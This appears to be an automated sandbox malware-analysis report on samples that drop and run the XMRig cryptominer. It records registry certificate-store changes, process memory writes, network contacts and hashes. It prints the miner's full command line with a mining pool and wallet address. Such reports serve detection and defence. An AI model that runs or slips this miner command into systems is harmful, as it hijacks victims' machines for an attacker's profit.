| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2428 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2428 wrote to memory of 4948 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4948-16-0x000001E421C90000-0x000001E421CB0000-memory.dmp
memory/4948-17-0x000001E4B5900000-0x000001E4B5920000-memory.dmp
memory/4948-18-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-21-0x000001E4B5F50000-0x000001E4B5F70000-memory.dmp
memory/4948-20-0x000001E4B5F70000-0x000001E4B5F90000-memory.dmp
memory/4948-19-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-22-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-23-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-24-0x000001E4B5F70000-0x000001E4B5F90000-memory.dmp
memory/4948-25-0x000001E4B5F50000-0x000001E4B5F70000-memory.dmp
memory/4948-26-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-27-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-28-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-29-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-30-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-31-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-32-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-33-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-34-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-35-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-36-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-37-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-38-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-39-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-40-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-41-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-42-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-43-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-44-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-45-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-46-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-47-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-48-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-49-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-50-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-51-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-52-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-53-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-54-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-55-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-56-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-57-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-58-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-59-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-60-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-61-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-62-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-63-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-64-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-65-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-66-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-67-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-68-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-69-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-70-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-71-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-72-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-73-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-74-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-75-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-76-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-77-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-78-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-79-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-80-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-81-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-82-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-83-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
memory/4948-84-0x00007FF67B920000-0x00007FF67C423000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 752 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 220 wrote to memory of 752 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/752-16-0x00000206F7210000-0x00000206F7230000-memory.dmp
memory/752-17-0x00000206F8B10000-0x00000206F8B30000-memory.dmp
memory/752-18-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-19-0x00000206F8B30000-0x00000206F8B50000-memory.dmp
memory/752-20-0x00000206F8B50000-0x00000206F8B70000-memory.dmp
memory/752-21-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-22-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-25-0x00000206F8B50000-0x00000206F8B70000-memory.dmp
memory/752-24-0x00000206F8B30000-0x00000206F8B50000-memory.dmp
memory/752-23-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-26-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-27-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-28-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-29-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-30-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-31-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-32-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-33-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-34-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-35-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-36-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-37-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-38-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-39-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-40-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-41-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-42-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-43-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-44-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-45-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-46-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-47-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-48-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-49-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-50-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-51-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-52-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-53-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-54-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-55-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-56-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-57-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-58-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-59-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-60-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-61-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-62-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-63-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-64-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-65-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-66-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-67-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-68-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-69-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-70-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-71-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-72-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-73-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-74-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-75-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-76-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-77-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-78-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-79-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-80-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-81-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-82-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-83-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp
memory/752-84-0x00007FF7D98C0000-0x00007FF7DA3C3000-memory.dmp